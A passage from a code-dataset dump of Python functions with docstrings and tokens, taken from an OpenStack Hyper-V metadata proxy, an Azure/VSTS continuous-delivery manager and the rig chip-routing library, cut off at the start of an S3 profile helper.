"-",
"proxy",
"."
] | train | https://github.com/openstack/networking-hyperv/blob/7a89306ab0586c95b99debb44d898f70834508b9/networking_hyperv/neutron/agent/hnv_metadata_agent.py#L227-L233 |
openstack/networking-hyperv | networking_hyperv/neutron/agent/hnv_metadata_agent.py | _MetadataProxyHandler._get_port_profile_id | def _get_port_profile_id(self, request):
"""Get the port profile ID from the request path."""
# Note(alexcoman): The port profile ID can be found as suffix
# in request path.
port_profile_id = request.path.split("/")[-1].strip()
if uuidutils.is_uuid_like(port_profile_id):
LOG.debug("The instance id was found in request path.")
return port_profile_id
LOG.debug("Failed to get the instance id from the request.")
return None | python | def _get_port_profile_id(self, request):
"""Get the port profile ID from the request path."""
# Note(alexcoman): The port profile ID can be found as a suffix
# in the request path.
port_profile_id = request.path.split("/")[-1].strip()
if uuidutils.is_uuid_like(port_profile_id):
LOG.debug("The instance id was found in request path.")
return port_profile_id
LOG.debug("Failed to get the instance id from the request.")
return None | [
"def",
"_get_port_profile_id",
"(",
"self",
",",
"request",
")",
":",
"# Note(alexcoman): The port profile ID can be found as suffix",
"# in request path.",
"port_profile_id",
"=",
"request",
".",
"path",
".",
"split",
"(",
"\"/\"",
")",
"[",
"-",
"1",
"]",
".",
"strip",
"(",
")",
"if",
"uuidutils",
".",
"is_uuid_like",
"(",
"port_profile_id",
")",
":",
"LOG",
".",
"debug",
"(",
"\"The instance id was found in request path.\"",
")",
"return",
"port_profile_id",
"LOG",
".",
"debug",
"(",
"\"Failed to get the instance id from the request.\"",
")",
"return",
"None"
] | Get the port profile ID from the request path. | [
"Get",
"the",
"port",
"profile",
"ID",
"from",
"the",
"request",
"path",
"."
] | train | https://github.com/openstack/networking-hyperv/blob/7a89306ab0586c95b99debb44d898f70834508b9/networking_hyperv/neutron/agent/hnv_metadata_agent.py#L63-L74 |
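The parsing above only needs the request's `path` attribute, so a stand-in object is enough to see the behaviour (the UUID below is made up, and `oslo.utils` must be installed):

```python
import types
from oslo_utils import uuidutils

req = types.SimpleNamespace(path='/9f2d8f20-1a7b-4f4e-9c5e-0d9a4a3b1c2d')
candidate = req.path.split('/')[-1].strip()
print(uuidutils.is_uuid_like(candidate))  # True -> treated as the port profile ID
```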
openstack/networking-hyperv | networking_hyperv/neutron/agent/hnv_metadata_agent.py | MetadataProxy._setup_rpc | def _setup_rpc(self):
"""Setup the RPC client for the current agent."""
self._state_rpc = agent_rpc.PluginReportStateAPI(topics.REPORTS)
report_interval = CONF.AGENT.report_interval
if report_interval:
heartbeat = loopingcall.FixedIntervalLoopingCall(
self._report_state)
heartbeat.start(interval=report_interval) | python | def _setup_rpc(self):
"""Setup the RPC client for the current agent."""
self._state_rpc = agent_rpc.PluginReportStateAPI(topics.REPORTS)
report_interval = CONF.AGENT.report_interval
if report_interval:
heartbeat = loopingcall.FixedIntervalLoopingCall(
self._report_state)
heartbeat.start(interval=report_interval) | [
"def",
"_setup_rpc",
"(",
"self",
")",
":",
"self",
".",
"_state_rpc",
"=",
"agent_rpc",
".",
"PluginReportStateAPI",
"(",
"topics",
".",
"REPORTS",
")",
"report_interval",
"=",
"CONF",
".",
"AGENT",
".",
"report_interval",
"if",
"report_interval",
":",
"heartbeat",
"=",
"loopingcall",
".",
"FixedIntervalLoopingCall",
"(",
"self",
".",
"_report_state",
")",
"heartbeat",
".",
"start",
"(",
"interval",
"=",
"report_interval",
")"
] | Setup the RPC client for the current agent. | [
"Setup",
"the",
"RPC",
"client",
"for",
"the",
"current",
"agent",
"."
] | train | https://github.com/openstack/networking-hyperv/blob/7a89306ab0586c95b99debb44d898f70834508b9/networking_hyperv/neutron/agent/hnv_metadata_agent.py#L186-L193 |
openstack/networking-hyperv | networking_hyperv/neutron/agent/hnv_metadata_agent.py | MetadataProxy._work | def _work(self):
"""Start the neutron-hnv-metadata-proxy agent."""
server = wsgi.Server(
name=self._AGENT_BINARY,
num_threads=CONF.AGENT.worker_count)
server.start(
application=_MetadataProxyHandler(),
port=CONF.bind_port,
host=CONF.bind_host)
server.wait() | python | def _work(self):
"""Start the neutron-hnv-metadata-proxy agent."""
server = wsgi.Server(
name=self._AGENT_BINARY,
num_threads=CONF.AGENT.worker_count)
server.start(
application=_MetadataProxyHandler(),
port=CONF.bind_port,
host=CONF.bind_host)
server.wait() | [
"def",
"_work",
"(",
"self",
")",
":",
"server",
"=",
"wsgi",
".",
"Server",
"(",
"name",
"=",
"self",
".",
"_AGENT_BINARY",
",",
"num_threads",
"=",
"CONF",
".",
"AGENT",
".",
"worker_count",
")",
"server",
".",
"start",
"(",
"application",
"=",
"_MetadataProxyHandler",
"(",
")",
",",
"port",
"=",
"CONF",
".",
"bind_port",
",",
"host",
"=",
"CONF",
".",
"bind_host",
")",
"server",
".",
"wait",
"(",
")"
] | Start the neutron-hnv-metadata-proxy agent. | [
"Start",
"the",
"neutron",
"-",
"hnv",
"-",
"metadata",
"-",
"proxy",
"agent",
"."
] | train | https://github.com/openstack/networking-hyperv/blob/7a89306ab0586c95b99debb44d898f70834508b9/networking_hyperv/neutron/agent/hnv_metadata_agent.py#L202-L211 |
Microsoft/vsts-cd-manager | vsts_cd_manager/continuous_delivery_manager.py | ContinuousDeliveryManager.set_azure_web_info | def set_azure_web_info(self, resource_group_name, website_name, credentials,
subscription_id, subscription_name, tenant_id, webapp_location):
"""
Call this method before attempting to set up continuous delivery; it configures the Azure settings
:param resource_group_name:
:param website_name:
:param credentials:
:param subscription_id:
:param subscription_name:
:param tenant_id:
:param webapp_location:
:return:
"""
self._azure_info.resource_group_name = resource_group_name
self._azure_info.website_name = website_name
self._azure_info.credentials = credentials
self._azure_info.subscription_id = subscription_id
self._azure_info.subscription_name = subscription_name
self._azure_info.tenant_id = tenant_id
self._azure_info.webapp_location = webapp_location | python | def set_azure_web_info(self, resource_group_name, website_name, credentials,
subscription_id, subscription_name, tenant_id, webapp_location):
"""
Call this method before attempting to set up continuous delivery; it configures the Azure settings
:param resource_group_name:
:param website_name:
:param credentials:
:param subscription_id:
:param subscription_name:
:param tenant_id:
:param webapp_location:
:return:
"""
self._azure_info.resource_group_name = resource_group_name
self._azure_info.website_name = website_name
self._azure_info.credentials = credentials
self._azure_info.subscription_id = subscription_id
self._azure_info.subscription_name = subscription_name
self._azure_info.tenant_id = tenant_id
self._azure_info.webapp_location = webapp_location | [
"def",
"set_azure_web_info",
"(",
"self",
",",
"resource_group_name",
",",
"website_name",
",",
"credentials",
",",
"subscription_id",
",",
"subscription_name",
",",
"tenant_id",
",",
"webapp_location",
")",
":",
"self",
".",
"_azure_info",
".",
"resource_group_name",
"=",
"resource_group_name",
"self",
".",
"_azure_info",
".",
"website_name",
"=",
"website_name",
"self",
".",
"_azure_info",
".",
"credentials",
"=",
"credentials",
"self",
".",
"_azure_info",
".",
"subscription_id",
"=",
"subscription_id",
"self",
".",
"_azure_info",
".",
"subscription_name",
"=",
"subscription_name",
"self",
".",
"_azure_info",
".",
"tenant_id",
"=",
"tenant_id",
"self",
".",
"_azure_info",
".",
"webapp_location",
"=",
"webapp_location"
] | Call this method before attempting to set up continuous delivery; it configures the Azure settings
:param resource_group_name:
:param website_name:
:param credentials:
:param subscription_id:
:param subscription_name:
:param tenant_id:
:param webapp_location:
:return: | [
"Call",
"this",
"method",
"before",
"attempting",
"to",
"setup",
"continuous",
"delivery",
"to",
"setup",
"the",
"azure",
"settings",
":",
"param",
"resource_group_name",
":",
":",
"param",
"website_name",
":",
":",
"param",
"credentials",
":",
":",
"param",
"subscription_id",
":",
":",
"param",
"subscription_name",
":",
":",
"param",
"tenant_id",
":",
":",
"param",
"webapp_location",
":",
":",
"return",
":"
] | train | https://github.com/Microsoft/vsts-cd-manager/blob/2649d236be94d119b13e0ac607964c94a9e51fde/vsts_cd_manager/continuous_delivery_manager.py#L42-L61 |
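A hedged call sketch: every value is a placeholder, `creds` stands for whatever Azure credentials object the caller already holds, and the constructor argument is assumed to be a progress callback:

```python
cd_manager = ContinuousDeliveryManager(None)  # progress callback (assumed)
cd_manager.set_azure_web_info(
    resource_group_name='my-rg',                                  # hypothetical
    website_name='my-webapp',                                     # hypothetical
    credentials=creds,                                            # caller-supplied
    subscription_id='00000000-0000-0000-0000-000000000000',
    subscription_name='My Subscription',
    tenant_id='11111111-1111-1111-1111-111111111111',
    webapp_location='West US')
```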
Microsoft/vsts-cd-manager | vsts_cd_manager/continuous_delivery_manager.py | ContinuousDeliveryManager.set_repository_info | def set_repository_info(self, repo_url, branch, git_token, private_repo_username, private_repo_password):
"""
Call this method before attempting to set up continuous delivery; it configures the source control settings
:param repo_url: URL of the code repo
:param branch: repo branch
:param git_token: git token
:param private_repo_username: private repo username
:param private_repo_password: private repo password
:return:
"""
self._repo_info.url = repo_url
self._repo_info.branch = branch
self._repo_info.git_token = git_token
self._repo_info._private_repo_username = private_repo_username
self._repo_info._private_repo_password = private_repo_password | python | def set_repository_info(self, repo_url, branch, git_token, private_repo_username, private_repo_password):
"""
Call this method before attempting to set up continuous delivery; it configures the source control settings
:param repo_url: URL of the code repo
:param branch: repo branch
:param git_token: git token
:param private_repo_username: private repo username
:param private_repo_password: private repo password
:return:
"""
self._repo_info.url = repo_url
self._repo_info.branch = branch
self._repo_info.git_token = git_token
self._repo_info._private_repo_username = private_repo_username
self._repo_info._private_repo_password = private_repo_password | [
"def",
"set_repository_info",
"(",
"self",
",",
"repo_url",
",",
"branch",
",",
"git_token",
",",
"private_repo_username",
",",
"private_repo_password",
")",
":",
"self",
".",
"_repo_info",
".",
"url",
"=",
"repo_url",
"self",
".",
"_repo_info",
".",
"branch",
"=",
"branch",
"self",
".",
"_repo_info",
".",
"git_token",
"=",
"git_token",
"self",
".",
"_repo_info",
".",
"_private_repo_username",
"=",
"private_repo_username",
"self",
".",
"_repo_info",
".",
"_private_repo_password",
"=",
"private_repo_password"
] | Call this method before attempting to set up continuous delivery; it configures the source control settings
:param repo_url: URL of the code repo
:param branch: repo branch
:param git_token: git token
:param private_repo_username: private repo username
:param private_repo_password: private repo password
:return: | [
"Call",
"this",
"method",
"before",
"attempting",
"to",
"setup",
"continuous",
"delivery",
"to",
"setup",
"the",
"source",
"control",
"settings",
":",
"param",
"repo_url",
":",
"URL",
"of",
"the",
"code",
"repo",
":",
"param",
"branch",
":",
"repo",
"branch",
":",
"param",
"git_token",
":",
"git",
"token",
":",
"param",
"private_repo_username",
":",
"private",
"repo",
"username",
":",
"param",
"private_repo_password",
":",
"private",
"repo",
"password",
":",
"return",
":"
] | train | https://github.com/Microsoft/vsts-cd-manager/blob/2649d236be94d119b13e0ac607964c94a9e51fde/vsts_cd_manager/continuous_delivery_manager.py#L63-L77 |
Microsoft/vsts-cd-manager | vsts_cd_manager/continuous_delivery_manager.py | ContinuousDeliveryManager.setup_continuous_delivery | def setup_continuous_delivery(self, swap_with_slot, app_type_details, cd_project_url, create_account,
vsts_app_auth_token, test, webapp_list):
"""
Use this method to set up Continuous Delivery of an Azure web site from a source control repository.
:param swap_with_slot: the slot to use for deployment
:param app_type_details: the details of the app that will be deployed, e.g. app_type = Python, python_framework = Django, etc.
:param cd_project_url: CD Project url in the format of https://<accountname>.visualstudio.com/<projectname>
:param create_account: Boolean value deciding whether an account needs to be created
:param vsts_app_auth_token: Authentication token for vsts app
:param test: Load test webapp name
:param webapp_list: Existing webapp list
:return: a message indicating final status and instructions for the user
"""
branch = self._repo_info.branch or 'refs/heads/master'
self._validate_cd_project_url(cd_project_url)
vsts_account_name = self._get_vsts_account_name(cd_project_url)
# Verify inputs before we start generating tokens
source_repository, account_name, team_project_name = self._get_source_repository(self._repo_info.url,
self._repo_info.git_token, branch, self._azure_info.credentials,
self._repo_info._private_repo_username, self._repo_info._private_repo_password)
self._verify_vsts_parameters(vsts_account_name, source_repository)
vsts_account_name = vsts_account_name or account_name
cd_project_name = team_project_name or self._azure_info.website_name
account_url = 'https://{}.visualstudio.com'.format(quote(vsts_account_name))
portalext_account_url = 'https://{}.portalext.visualstudio.com'.format(quote(vsts_account_name))
# VSTS Account using AEX APIs
account_created = False
if create_account:
self.create_vsts_account(self._azure_info.credentials, vsts_account_name)
account_created = True
# Create ContinuousDelivery client
cd = ContinuousDelivery('3.2-preview.1', portalext_account_url, self._azure_info.credentials)
# Construct the config body of the continuous delivery call
build_configuration = self._get_build_configuration(app_type_details)
source = ProvisioningConfigurationSource('codeRepository', source_repository, build_configuration)
auth_info = AuthorizationInfo('Headers', AuthorizationInfoParameters('Bearer ' + vsts_app_auth_token))
target = self.get_provisioning_configuration_target(auth_info, swap_with_slot, test, webapp_list)
ci_config = CiConfiguration(CiArtifact(name=cd_project_name))
config = ProvisioningConfiguration(None, source, target, ci_config)
# Configure the continuous delivery using VSTS as a backend
response = cd.provisioning_configuration(config)
if response.ci_configuration.result.status == 'queued':
final_status = self._wait_for_cd_completion(cd, response)
return self._get_summary(final_status, account_url, vsts_account_name, account_created, self._azure_info.subscription_id,
self._azure_info.resource_group_name, self._azure_info.website_name)
else:
raise RuntimeError('Unknown status returned from provisioning_configuration: ' + response.ci_configuration.result.status) | python | def setup_continuous_delivery(self, swap_with_slot, app_type_details, cd_project_url, create_account,
vsts_app_auth_token, test, webapp_list):
"""
Use this method to set up Continuous Delivery of an Azure web site from a source control repository.
:param swap_with_slot: the slot to use for deployment
:param app_type_details: the details of the app that will be deployed, e.g. app_type = Python, python_framework = Django, etc.
:param cd_project_url: CD Project url in the format of https://<accountname>.visualstudio.com/<projectname>
:param create_account: Boolean value deciding whether an account needs to be created
:param vsts_app_auth_token: Authentication token for vsts app
:param test: Load test webapp name
:param webapp_list: Existing webapp list
:return: a message indicating final status and instructions for the user
"""
branch = self._repo_info.branch or 'refs/heads/master'
self._validate_cd_project_url(cd_project_url)
vsts_account_name = self._get_vsts_account_name(cd_project_url)
# Verify inputs before we start generating tokens
source_repository, account_name, team_project_name = self._get_source_repository(self._repo_info.url,
self._repo_info.git_token, branch, self._azure_info.credentials,
self._repo_info._private_repo_username, self._repo_info._private_repo_password)
self._verify_vsts_parameters(vsts_account_name, source_repository)
vsts_account_name = vsts_account_name or account_name
cd_project_name = team_project_name or self._azure_info.website_name
account_url = 'https://{}.visualstudio.com'.format(quote(vsts_account_name))
portalext_account_url = 'https://{}.portalext.visualstudio.com'.format(quote(vsts_account_name))
# VSTS Account using AEX APIs
account_created = False
if create_account:
self.create_vsts_account(self._azure_info.credentials, vsts_account_name)
account_created = True
# Create ContinuousDelivery client
cd = ContinuousDelivery('3.2-preview.1', portalext_account_url, self._azure_info.credentials)
# Construct the config body of the continuous delivery call
build_configuration = self._get_build_configuration(app_type_details)
source = ProvisioningConfigurationSource('codeRepository', source_repository, build_configuration)
auth_info = AuthorizationInfo('Headers', AuthorizationInfoParameters('Bearer ' + vsts_app_auth_token))
target = self.get_provisioning_configuration_target(auth_info, swap_with_slot, test, webapp_list)
ci_config = CiConfiguration(CiArtifact(name=cd_project_name))
config = ProvisioningConfiguration(None, source, target, ci_config)
# Configure the continuous delivery using VSTS as a backend
response = cd.provisioning_configuration(config)
if response.ci_configuration.result.status == 'queued':
final_status = self._wait_for_cd_completion(cd, response)
return self._get_summary(final_status, account_url, vsts_account_name, account_created, self._azure_info.subscription_id,
self._azure_info.resource_group_name, self._azure_info.website_name)
else:
raise RuntimeError('Unknown status returned from provisioning_configuration: ' + response.ci_configuration.result.status) | [
"def",
"setup_continuous_delivery",
"(",
"self",
",",
"swap_with_slot",
",",
"app_type_details",
",",
"cd_project_url",
",",
"create_account",
",",
"vsts_app_auth_token",
",",
"test",
",",
"webapp_list",
")",
":",
"branch",
"=",
"self",
".",
"_repo_info",
".",
"branch",
"or",
"'refs/heads/master'",
"self",
".",
"_validate_cd_project_url",
"(",
"cd_project_url",
")",
"vsts_account_name",
"=",
"self",
".",
"_get_vsts_account_name",
"(",
"cd_project_url",
")",
"# Verify inputs before we start generating tokens",
"source_repository",
",",
"account_name",
",",
"team_project_name",
"=",
"self",
".",
"_get_source_repository",
"(",
"self",
".",
"_repo_info",
".",
"url",
",",
"self",
".",
"_repo_info",
".",
"git_token",
",",
"branch",
",",
"self",
".",
"_azure_info",
".",
"credentials",
",",
"self",
".",
"_repo_info",
".",
"_private_repo_username",
",",
"self",
".",
"_repo_info",
".",
"_private_repo_password",
")",
"self",
".",
"_verify_vsts_parameters",
"(",
"vsts_account_name",
",",
"source_repository",
")",
"vsts_account_name",
"=",
"vsts_account_name",
"or",
"account_name",
"cd_project_name",
"=",
"team_project_name",
"or",
"self",
".",
"_azure_info",
".",
"website_name",
"account_url",
"=",
"'https://{}.visualstudio.com'",
".",
"format",
"(",
"quote",
"(",
"vsts_account_name",
")",
")",
"portalext_account_url",
"=",
"'https://{}.portalext.visualstudio.com'",
".",
"format",
"(",
"quote",
"(",
"vsts_account_name",
")",
")",
"# VSTS Account using AEX APIs",
"account_created",
"=",
"False",
"if",
"create_account",
":",
"self",
".",
"create_vsts_account",
"(",
"self",
".",
"_azure_info",
".",
"credentials",
",",
"vsts_account_name",
")",
"account_created",
"=",
"True",
"# Create ContinuousDelivery client",
"cd",
"=",
"ContinuousDelivery",
"(",
"'3.2-preview.1'",
",",
"portalext_account_url",
",",
"self",
".",
"_azure_info",
".",
"credentials",
")",
"# Construct the config body of the continuous delivery call",
"build_configuration",
"=",
"self",
".",
"_get_build_configuration",
"(",
"app_type_details",
")",
"source",
"=",
"ProvisioningConfigurationSource",
"(",
"'codeRepository'",
",",
"source_repository",
",",
"build_configuration",
")",
"auth_info",
"=",
"AuthorizationInfo",
"(",
"'Headers'",
",",
"AuthorizationInfoParameters",
"(",
"'Bearer '",
"+",
"vsts_app_auth_token",
")",
")",
"target",
"=",
"self",
".",
"get_provisioning_configuration_target",
"(",
"auth_info",
",",
"swap_with_slot",
",",
"test",
",",
"webapp_list",
")",
"ci_config",
"=",
"CiConfiguration",
"(",
"CiArtifact",
"(",
"name",
"=",
"cd_project_name",
")",
")",
"config",
"=",
"ProvisioningConfiguration",
"(",
"None",
",",
"source",
",",
"target",
",",
"ci_config",
")",
"# Configure the continuous deliver using VSTS as a backend",
"response",
"=",
"cd",
".",
"provisioning_configuration",
"(",
"config",
")",
"if",
"response",
".",
"ci_configuration",
".",
"result",
".",
"status",
"==",
"'queued'",
":",
"final_status",
"=",
"self",
".",
"_wait_for_cd_completion",
"(",
"cd",
",",
"response",
")",
"return",
"self",
".",
"_get_summary",
"(",
"final_status",
",",
"account_url",
",",
"vsts_account_name",
",",
"account_created",
",",
"self",
".",
"_azure_info",
".",
"subscription_id",
",",
"self",
".",
"_azure_info",
".",
"resource_group_name",
",",
"self",
".",
"_azure_info",
".",
"website_name",
")",
"else",
":",
"raise",
"RuntimeError",
"(",
"'Unknown status returned from provisioning_configuration: '",
"+",
"response",
".",
"ci_configuration",
".",
"result",
".",
"status",
")"
] | Use this method to set up Continuous Delivery of an Azure web site from a source control repository.
:param swap_with_slot: the slot to use for deployment
:param app_type_details: the details of the app that will be deployed, e.g. app_type = Python, python_framework = Django, etc.
:param cd_project_url: CD Project url in the format of https://<accountname>.visualstudio.com/<projectname>
:param create_account: Boolean value deciding whether an account needs to be created
:param vsts_app_auth_token: Authentication token for vsts app
:param test: Load test webapp name
:param webapp_list: Existing webapp list
:return: a message indicating final status and instructions for the user | [
"Use",
"this",
"method",
"to",
"setup",
"Continuous",
"Delivery",
"of",
"an",
"Azure",
"web",
"site",
"from",
"a",
"source",
"control",
"repository",
".",
":",
"param",
"swap_with_slot",
":",
"the",
"slot",
"to",
"use",
"for",
"deployment",
":",
"param",
"app_type_details",
":",
"the",
"details",
"of",
"app",
"that",
"will",
"be",
"deployed",
".",
"i",
".",
"e",
".",
"app_type",
"=",
"Python",
"python_framework",
"=",
"Django",
"etc",
".",
":",
"param",
"cd_project_url",
":",
"CD",
"Project",
"url",
"in",
"the",
"format",
"of",
"https",
":",
"//",
"<accountname",
">",
".",
"visualstudio",
".",
"com",
"/",
"<projectname",
">",
":",
"param",
"create_account",
":",
"Boolean",
"value",
"to",
"decide",
"if",
"account",
"need",
"to",
"be",
"created",
"or",
"not",
":",
"param",
"vsts_app_auth_token",
":",
"Authentication",
"token",
"for",
"vsts",
"app",
":",
"param",
"test",
":",
"Load",
"test",
"webapp",
"name",
":",
"param",
"webapp_list",
":",
"Existing",
"webapp",
"list",
":",
"return",
":",
"a",
"message",
"indicating",
"final",
"status",
"and",
"instructions",
"for",
"the",
"user"
] | train | https://github.com/Microsoft/vsts-cd-manager/blob/2649d236be94d119b13e0ac607964c94a9e51fde/vsts_cd_manager/continuous_delivery_manager.py#L87-L139 |
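Putting the three calls together in one sketch; the repository values are placeholders and the `app_type_details` shape is only inferred from the docstring above, so treat its keys as assumptions:

```python
cd_manager.set_repository_info(
    repo_url='https://github.com/example/my-webapp',  # hypothetical repo
    branch='refs/heads/master',
    git_token='<github-token>',
    private_repo_username=None,
    private_repo_password=None)

app_type_details = {                # keys inferred from the docstring, not verified
    'app_type': 'Python',
    'python_framework': 'Django',
}
summary = cd_manager.setup_continuous_delivery(
    swap_with_slot=None,            # deploy to the production slot
    app_type_details=app_type_details,
    cd_project_url='https://myaccount.visualstudio.com/MyProject',
    create_account=False,
    vsts_app_auth_token='<vsts-oauth-token>',
    test=None,
    webapp_list=None)
print(summary)                      # final status and user instructions
```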
project-rig/rig | rig/place_and_route/route/utils.py | longest_dimension_first | def longest_dimension_first(vector, start=(0, 0), width=None, height=None):
"""List the (x, y) steps on a longest-dimension first route.
Note that when multiple dimensions are the same magnitude, one will be
chosen at random with uniform probability.
Parameters
----------
vector : (x, y, z)
The vector which the path should cover.
start : (x, y)
The coordinates from which the path should start (note this is a 2D
coordinate).
width : int or None
The width of the topology beyond which we wrap around (0 <= x < width).
If None, no wrapping on the X axis will occur.
height : int or None
The height of the topology beyond which we wrap around (0 <= y <
height). If None, no wrapping on the Y axis will occur.
Returns
-------
[(:py:class:`~rig.links.Links`, (x, y)), ...]
Produces (in order) a (direction, (x, y)) pair for every hop along the
longest dimension first route. The direction gives the direction to
travel in from the previous step to reach the current step. Ties are
broken randomly. The first generated value is that of the first hop
after the starting position, the last generated value is the
destination position.
"""
x, y = start
out = []
for dimension, magnitude in sorted(enumerate(vector),
key=(lambda x:
abs(x[1]) + random.random()),
reverse=True):
if magnitude == 0:
break
# Advance in the specified direction
sign = 1 if magnitude > 0 else -1
for _ in range(abs(magnitude)):
if dimension == 0:
dx, dy = sign, 0
elif dimension == 1:
dx, dy = 0, sign
elif dimension == 2: # pragma: no branch
dx, dy = -sign, -sign
x += dx
y += dy
# Wrap-around if required
if width is not None:
x %= width
if height is not None:
y %= height
direction = Links.from_vector((dx, dy))
out.append((direction, (x, y)))
return out | python | def longest_dimension_first(vector, start=(0, 0), width=None, height=None):
"""List the (x, y) steps on a longest-dimension first route.
Note that when multiple dimensions are the same magnitude, one will be
chosen at random with uniform probability.
Parameters
----------
vector : (x, y, z)
The vector which the path should cover.
start : (x, y)
The coordinates from which the path should start (note this is a 2D
coordinate).
width : int or None
The width of the topology beyond which we wrap around (0 <= x < width).
If None, no wrapping on the X axis will occur.
height : int or None
The height of the topology beyond which we wrap around (0 <= y <
height). If None, no wrapping on the Y axis will occur.
Returns
-------
[(:py:class:`~rig.links.Links`, (x, y)), ...]
Produces (in order) a (direction, (x, y)) pair for every hop along the
longest dimension first route. The direction gives the direction to
travel in from the previous step to reach the current step. Ties are
broken randomly. The first generated value is that of the first hop
after the starting position, the last generated value is the
destination position.
"""
x, y = start
out = []
for dimension, magnitude in sorted(enumerate(vector),
key=(lambda x:
abs(x[1]) + random.random()),
reverse=True):
if magnitude == 0:
break
# Advance in the specified direction
sign = 1 if magnitude > 0 else -1
for _ in range(abs(magnitude)):
if dimension == 0:
dx, dy = sign, 0
elif dimension == 1:
dx, dy = 0, sign
elif dimension == 2: # pragma: no branch
dx, dy = -sign, -sign
x += dx
y += dy
# Wrap-around if required
if width is not None:
x %= width
if height is not None:
y %= height
direction = Links.from_vector((dx, dy))
out.append((direction, (x, y)))
return out | [
"def",
"longest_dimension_first",
"(",
"vector",
",",
"start",
"=",
"(",
"0",
",",
"0",
")",
",",
"width",
"=",
"None",
",",
"height",
"=",
"None",
")",
":",
"x",
",",
"y",
"=",
"start",
"out",
"=",
"[",
"]",
"for",
"dimension",
",",
"magnitude",
"in",
"sorted",
"(",
"enumerate",
"(",
"vector",
")",
",",
"key",
"=",
"(",
"lambda",
"x",
":",
"abs",
"(",
"x",
"[",
"1",
"]",
")",
"+",
"random",
".",
"random",
"(",
")",
")",
",",
"reverse",
"=",
"True",
")",
":",
"if",
"magnitude",
"==",
"0",
":",
"break",
"# Advance in the specified direction",
"sign",
"=",
"1",
"if",
"magnitude",
">",
"0",
"else",
"-",
"1",
"for",
"_",
"in",
"range",
"(",
"abs",
"(",
"magnitude",
")",
")",
":",
"if",
"dimension",
"==",
"0",
":",
"dx",
",",
"dy",
"=",
"sign",
",",
"0",
"elif",
"dimension",
"==",
"1",
":",
"dx",
",",
"dy",
"=",
"0",
",",
"sign",
"elif",
"dimension",
"==",
"2",
":",
"# pragma: no branch",
"dx",
",",
"dy",
"=",
"-",
"sign",
",",
"-",
"sign",
"x",
"+=",
"dx",
"y",
"+=",
"dy",
"# Wrap-around if required",
"if",
"width",
"is",
"not",
"None",
":",
"x",
"%=",
"width",
"if",
"height",
"is",
"not",
"None",
":",
"y",
"%=",
"height",
"direction",
"=",
"Links",
".",
"from_vector",
"(",
"(",
"dx",
",",
"dy",
")",
")",
"out",
".",
"append",
"(",
"(",
"direction",
",",
"(",
"x",
",",
"y",
")",
")",
")",
"return",
"out"
] | List the (x, y) steps on a longest-dimension first route.
Note that when multiple dimensions are the same magnitude, one will be
chosen at random with uniform probability.
Parameters
----------
vector : (x, y, z)
The vector which the path should cover.
start : (x, y)
The coordinates from which the path should start (note this is a 2D
coordinate).
width : int or None
The width of the topology beyond which we wrap around (0 <= x < width).
If None, no wrapping on the X axis will occur.
height : int or None
The height of the topology beyond which we wrap around (0 <= y <
height). If None, no wrapping on the Y axis will occur.
Returns
-------
[(:py:class:`~rig.links.Links`, (x, y)), ...]
Produces (in order) a (direction, (x, y)) pair for every hop along the
longest dimension first route. The direction gives the direction to
travel in from the previous step to reach the current step. Ties are
broken randomly. The first generated value is that of the first hop
after the starting position, the last generated value is the
destination position. | [
"List",
"the",
"(",
"x",
"y",
")",
"steps",
"on",
"a",
"longest",
"-",
"dimension",
"first",
"route",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/place_and_route/route/utils.py#L9-L73 |
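A minimal usage sketch for the record above (assuming the `rig` package is importable; the module path is taken from the func_code_url field). The vector, start chip, and torus size are illustrative values, not part of the record:

import random
from rig.place_and_route.route.utils import longest_dimension_first

random.seed(1)  # randomness only breaks ties between equal-magnitude dimensions

# Cover the vector (x=+2, y=+1, z=0) from chip (0, 0) on an 8x8 torus. The X
# component has the largest magnitude, so both eastward hops come first.
for direction, (x, y) in longest_dimension_first((2, 1, 0), start=(0, 0),
                                                 width=8, height=8):
    print(direction, (x, y))
# Expected hops: Links.east (1, 0), Links.east (2, 0), Links.north (2, 1)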
project-rig/rig | rig/place_and_route/route/utils.py | links_between | def links_between(a, b, machine):
"""Get the set of working links connecting chips a and b.
Parameters
----------
a : (x, y)
b : (x, y)
machine : :py:class:`~rig.place_and_route.Machine`
Returns
-------
set([:py:class:`~rig.links.Links`, ...])
"""
ax, ay = a
bx, by = b
return set(link for link, (dx, dy) in ((l, l.to_vector()) for l in Links)
if (ax + dx) % machine.width == bx and
(ay + dy) % machine.height == by and
(ax, ay, link) in machine) | python | def links_between(a, b, machine):
"""Get the set of working links connecting chips a and b.
Parameters
----------
a : (x, y)
b : (x, y)
machine : :py:class:`~rig.place_and_route.Machine`
Returns
-------
set([:py:class:`~rig.links.Links`, ...])
"""
ax, ay = a
bx, by = b
return set(link for link, (dx, dy) in ((l, l.to_vector()) for l in Links)
if (ax + dx) % machine.width == bx and
(ay + dy) % machine.height == by and
(ax, ay, link) in machine) | [
"def",
"links_between",
"(",
"a",
",",
"b",
",",
"machine",
")",
":",
"ax",
",",
"ay",
"=",
"a",
"bx",
",",
"by",
"=",
"b",
"return",
"set",
"(",
"link",
"for",
"link",
",",
"(",
"dx",
",",
"dy",
")",
"in",
"(",
"(",
"l",
",",
"l",
".",
"to_vector",
"(",
")",
")",
"for",
"l",
"in",
"Links",
")",
"if",
"(",
"ax",
"+",
"dx",
")",
"%",
"machine",
".",
"width",
"==",
"bx",
"and",
"(",
"ay",
"+",
"dy",
")",
"%",
"machine",
".",
"height",
"==",
"by",
"and",
"(",
"ax",
",",
"ay",
",",
"link",
")",
"in",
"machine",
")"
] | Get the set of working links connecting chips a and b.
Parameters
----------
a : (x, y)
b : (x, y)
machine : :py:class:`~rig.place_and_route.Machine`
Returns
-------
set([:py:class:`~rig.links.Links`, ...]) | [
"Get",
"the",
"set",
"of",
"working",
"links",
"connecting",
"chips",
"a",
"and",
"b",
"."
] | train | https://github.com/project-rig/rig/blob/3a3e053d3214899b6d68758685835de0afd5542b/rig/place_and_route/route/utils.py#L76-L94 |
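Because links_between only reads machine.width, machine.height, and membership of (x, y, link) tuples, a stub object is enough to exercise it. A sketch (Links comes from rig.links, as in the module above):

from rig.links import Links

class AllLinksWorking(object):
    # Stand-in for a rig Machine on a 2x2 torus with every link alive.
    width, height = 2, 2
    def __contains__(self, chip_and_link):
        return True

print(links_between((0, 0), (1, 0), AllLinksWorking()))
# On a 2-wide torus, (1, 0) is one hop east *and* one hop west of (0, 0),
# so the printed set contains both Links.east and Links.west.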
Metatab/metapack | metapack/package/s3.py | set_s3_profile | def set_s3_profile(profile_name):
"""Load the credentials for an s3 profile into environmental variables"""
import os
